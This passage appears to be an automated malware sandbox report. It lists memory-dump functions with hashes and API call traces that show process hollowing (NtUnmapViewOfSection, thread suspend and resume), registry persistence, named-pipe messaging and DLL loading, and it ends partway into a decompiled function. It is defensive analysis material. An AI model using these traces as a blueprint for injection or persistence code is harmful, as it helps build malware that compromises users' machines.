    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
